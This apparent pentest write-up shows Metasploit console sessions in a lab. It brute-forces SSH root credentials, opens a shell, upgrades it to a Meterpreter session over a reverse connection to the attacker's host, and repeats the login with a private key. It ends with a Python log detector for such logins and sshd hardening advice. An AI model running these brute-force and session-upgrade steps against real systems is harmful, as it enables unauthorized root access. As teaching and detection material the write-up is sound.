Pentest – SSH login


Username/Password Auth

msf auxiliary(ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         /tmp/pass.txt    no        File containing passwords, one per line
   RHOSTS            192.168.1.103    yes       The target address range or CIDR identifier
   RPORT             22222            yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           2                yes       The number of concurrent threads
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > run 

[*] 192.168.1.103:22222 SSH - Starting bruteforce
[-] 192.168.1.103:22222 SSH - Failed: 'root:pass'
[-] 192.168.1.103:22222 SSH - Failed: 'root:pass123'
[-] 192.168.1.103:22222 SSH - Failed: 'root:123456'
[-] 192.168.1.103:22222 SSH - Failed: 'root:admin'
[-] 192.168.1.103:22222 SSH - Failed: 'root:root'
[+] 192.168.1.103:22222 SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.108:41477 -> 192.168.1.103:22222) at 2015-11-09 13:55:40 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -l

Active sessions
===============

  Id  Type         Information                              Connection
  --  ----         -----------                              ----------
  1   shell linux  SSH root:password (192.168.1.103:22222)  192.168.1.108:41477 -> 192.168.1.103:22222 (192.168.1.103)

msf auxiliary(ssh_login) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions
    -c <opt>  Run a command on the session given with -i, or all
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List verbose fields


Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

msf auxiliary(ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 192.168.1.108:4433 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.103
[*] Command stager progress: 100.00% (670/670 bytes)
msf auxiliary(ssh_login) > [*] Meterpreter session 2 opened (192.168.1.108:4433 -> 192.168.1.103:57029) at 2015-11-09 13:56:32 +0000

msf auxiliary(ssh_login) > sessions -l

Active sessions
===============

  Id  Type                   Information                                          Connection
  --  ----                   -----------                                          ----------
  1   shell linux            SSH root:password (192.168.1.103:22222)              192.168.1.108:41477 -> 192.168.1.103:22222 (192.168.1.103)
  2   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ kali  192.168.1.108:4433 -> 192.168.1.103:57029 (192.168.1.103)

Key Auth

msf auxiliary(ssh_login_pubkey) > show options 

Module options (auxiliary/scanner/ssh/ssh_login_pubkey):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   KEY_PATH          /tmp/id_rsa      yes       Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped.
   RHOSTS            192.168.1.103    yes       The target address range or CIDR identifier
   RPORT             22222            yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME          root             no        A specific username to authenticate as
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login_pubkey) > run 

[*] 192.168.1.103:22222 SSH - Testing Cleartext Keys
[*] 192.168.1.103:22222 SSH - Testing 1 keys from /tmp/id_rsa
[+] 192.168.1.103:22222 SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----[...]-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(root) groups=0(root) Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux '
[*] Command shell session 9 opened (192.168.1.108:34357 -> 192.168.1.103:22222) at 2015-11-09 16:23:04 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
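Both runs above leave a characteristic trail in the target's sshd log: a burst of failed password guesses for root from one source followed by an accepted password (the ssh_login run), and later an accepted public key for root (the ssh_login_pubkey run). The following Python is an added detection example, not part of the original post or of Metasploit; the auth.log lines are constructed to mirror the two sessions above (timestamps, PIDs and key fingerprints are made up).

```python
import re
from collections import defaultdict

# Constructed sample of what the target's sshd would write to auth.log during
# the two runs shown above: five password guesses against root on port 22222,
# the guess that succeeds, an unrelated key login, and the root key login.
SAMPLE_AUTH_LOG = """\
Nov  9 13:55:38 kali sshd[2101]: Failed password for root from 192.168.1.108 port 41470 ssh2
Nov  9 13:55:38 kali sshd[2103]: Failed password for root from 192.168.1.108 port 41471 ssh2
Nov  9 13:55:39 kali sshd[2105]: Failed password for root from 192.168.1.108 port 41472 ssh2
Nov  9 13:55:39 kali sshd[2107]: Failed password for root from 192.168.1.108 port 41473 ssh2
Nov  9 13:55:39 kali sshd[2109]: Failed password for root from 192.168.1.108 port 41474 ssh2
Nov  9 13:55:40 kali sshd[2111]: Accepted password for root from 192.168.1.108 port 41477 ssh2
Nov  9 14:02:11 kali sshd[2150]: Accepted publickey for alice from 192.168.1.50 port 50200 ssh2: RSA SHA256:placeholder
Nov  9 16:23:04 kali sshd[2301]: Accepted publickey for root from 192.168.1.108 port 34357 ssh2: RSA SHA256:placeholder
"""

# Matches the OpenSSH "Failed/Accepted <method> for <user> from <ip> port <n>" form.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def analyze(log_text, fail_threshold=5):
    """Return findings as (src_ip, kind, user, method, failures_before_success).

    kind is "success_after_bruteforce" when a source logs in after at least
    fail_threshold consecutive failures, and "root_login" for any accepted
    login as root (password or key), since direct root access is what both
    modules above obtain.
    """
    fails = defaultdict(int)   # consecutive failures per source IP
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src, user, result, method = m["src"], m["user"], m["result"], m["method"]
        if result == "Failed":
            fails[src] += 1
            continue
        if fails[src] >= fail_threshold:
            findings.append((src, "success_after_bruteforce", user, method, fails[src]))
        if user == "root":
            findings.append((src, "root_login", user, method, fails[src]))
        fails[src] = 0           # a success ends the current failure run
    return findings
```

Both finding kinds map to sshd_config controls the target here lacked: PermitRootLogin (set to no or prohibit-password) removes the root_login case, and PasswordAuthentication no removes the password-guessing case entirely.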